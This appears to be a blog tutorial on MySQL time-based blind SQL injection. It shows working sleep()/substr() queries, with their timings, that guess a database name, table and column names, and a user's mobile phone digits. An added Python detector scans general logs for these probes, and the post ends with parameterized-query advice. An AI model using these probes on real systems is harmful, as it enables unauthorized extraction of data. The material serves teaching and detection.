  • MySQL time-based blind injection

    No error message from the page is required; the judgment is made from the page's response time alone!

    MySQL time-based blind injection
    ======================================================================================
    *	Guessing the database name
    	-	Below, the guess is correct (the query sleeps, so the response takes about 1 second)
    	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                             
    		+----------+
    		| sleep(1) |
    		+----------+
    		|        0 |
    		+----------+
    		1 row in set (1.00 sec)
    
    	-	Below, the guess is wrong (no row matches, so sleep() is never evaluated and the response is immediate)
    	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
    		Empty set (0.00 sec)
    
    
    *	Guessing the table name
    	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='f';
    			+----------+
    			| sleep(1) |
    			+----------+
    			|        0 |
    			+----------+
    			1 row in set (1.00 sec)
    
    	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='x';
    			Empty set (0.00 sec)
    
    
    *	Guessing column names
    	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 1, 1)='i';
    			+----------+
    			| sleep(1) |
    			+----------+
    			|        0 |
    			+----------+
    			1 row in set (1.01 sec)
    
    	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 2, 1)='d';
    			+----------+
    			| sleep(1) |
    			+----------+
    			|        0 |
    			+----------+
    			1 row in set (1.00 sec)
    
    
    *	Guessing column values
    	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
    			+----------+
    			| sleep(1) |
    			+----------+
    			|        0 |
    			+----------+
    			1 row in set (1.00 sec)
    
    	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';
    			
    
    	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
    			+----------+
    			| sleep(1) |
    			+----------+
    			|        0 |
    			+----------+
    			1 row in set (1.00 sec)
    
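    The probes above leave a recognisable trace on the server side: a delay function (sleep(), or BENCHMARK() as the CPU-burning equivalent) combined with a per-character comparison (substr(), ascii(), char(0x..)), often against information_schema or database(). The following detector, added here as an example and not part of the original post, scans MySQL general-log "Query" events for that combination. The log lines it runs on are constructed for this example in the shape the MySQL 5.7+/8.0 general log writes (timestamp, connection id, command, argument); the severity ladder and indicator names are this example's own choices.

    ```python
    import re
    from dataclasses import dataclass, field

    # Constructed MySQL general-log "Query" lines (not from the original post).
    # Line 2 mirrors the post's database-name probe; line 3 is the shape such a
    # probe takes when it rides inside an application query; line 4 is a
    # BENCHMARK() variant. Lines 1 and 5 are ordinary traffic.
    SAMPLE_GENERAL_LOG = """\
    2023-01-01T10:00:01.000000Z\t   12 Query\tSELECT id, name FROM f_user WHERE id = 42
    2023-01-01T10:00:02.000000Z\t   12 Query\tselect sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66)
    2023-01-01T10:00:03.000000Z\t   13 Query\tSELECT * FROM f_user WHERE name = 'alice' AND IF(substr(mobile_phone,1,1)='1', SLEEP(5), 0)
    2023-01-01T10:00:04.000000Z\t   14 Query\tSELECT BENCHMARK(5000000, MD5('x'))
    2023-01-01T10:00:05.000000Z\t   15 Query\tUPDATE f_user SET last_login = NOW() WHERE id = 7
    """

    # General-log line layout: <timestamp>\t<conn id> <command>\t<argument>
    LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

    # Indicator patterns. A delay function is the anchor; the others raise confidence.
    TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
    CHAR_PROBES = re.compile(r"\b(substr|substring|mid|ascii|ord|left|right)\s*\(", re.I)
    SCHEMA_REFS = re.compile(r"\binformation_schema\.(tables|columns|schemata)\b|\bdatabase\s*\(\s*\)", re.I)
    HEX_LITERALS = re.compile(r"\bchar\s*\(\s*0x[0-9a-f]+\s*\)|\b0x[0-9a-f]{2,}\b", re.I)


    @dataclass
    class Finding:
        conn: int
        sql: str
        indicators: list = field(default_factory=list)
        severity: str = "low"


    def classify(sql):
        """Return (indicators, severity) for one statement, or None if no delay function is present.

        A delay function alone is 'medium' (rarely legitimate in application traffic);
        combined with a per-character probe it is 'high', because that pairing is
        exactly the boolean-via-timing oracle shown in the post.
        """
        indicators = []
        if TIME_FUNCS.search(sql):
            indicators.append("delay-function")
        if CHAR_PROBES.search(sql):
            indicators.append("char-probe")
        if SCHEMA_REFS.search(sql):
            indicators.append("schema-enumeration")
        if HEX_LITERALS.search(sql):
            indicators.append("hex-literal")
        if "delay-function" not in indicators:
            return None
        severity = "high" if "char-probe" in indicators else "medium"
        return indicators, severity


    def parse_general_log(text):
        """Yield (conn_id, sql) for each Query event in general-log text; other events are skipped."""
        for line in text.splitlines():
            m = LOG_LINE.match(line)
            if m and m.group("cmd") == "Query":
                yield int(m.group("conn")), m.group("arg")


    def scan(text):
        """Run classify() over every Query event and return the flagged statements."""
        findings = []
        for conn, sql in parse_general_log(text):
            result = classify(sql)
            if result:
                indicators, severity = result
                findings.append(Finding(conn, sql, indicators, severity))
        return findings


    if __name__ == "__main__":
        for f in scan(SAMPLE_GENERAL_LOG):
            print(f"[{f.severity}] conn {f.conn}: {', '.join(f.indicators)} :: {f.sql[:70]}")
    ```

    Run against the constructed log it flags connections 12 and 13 as high and 14 as medium and leaves the two ordinary statements alone. The same signal is also visible without any log parsing: the post's own output shows a matching guess costing 1.00 sec against 0.00 sec for a miss, so a sudden run of near-identical requests from one client whose response times cluster at a fixed delay is worth alerting on even where the query text is not logged. The fix on the application side is to stop building SQL from request input at all and use parameterized queries, so that a substr()/sleep() fragment arrives as a string value rather than as SQL.
    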


  • Original source: https://www.cnblogs.com/6ruce/p/5844955.html